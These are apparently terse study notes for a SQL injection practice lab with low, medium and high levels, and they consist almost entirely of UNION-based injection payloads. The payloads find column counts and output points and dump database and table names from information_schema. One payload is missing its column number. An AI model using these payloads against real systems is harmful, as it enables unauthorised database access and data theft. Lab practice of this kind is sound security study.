SQL Injection
low
# 确定'闭合
payload: 1' #
# 确定显示列数
payload: 1' order by #
# 确定输出点
payload: -1' union select 1,2 #
# 爆库、爆表、爆字段
payload: -1' union select 1,database() #
-1' union select 1,concat(table_name) from information_schema.tables where table_schema=database() #
1' union select 1,table_name from information_schema.tables where table_schema=database() #
medium
# 确定显示列数
payload: id=1 order by 2&Submit=Submit
# 确定输出点
payload: id=-1 union select 1,2&Submit=Submit
# 爆库、爆表、爆字段
payload: id=-1 union select 1,database()&Submit=Submit
high
# 确定显示列数
payload: 1' order by 2 #
# 确定输出点
payload: -1' union select 1,2 #
# 爆库、爆表、爆字段
payload: -1' union select 1,database() #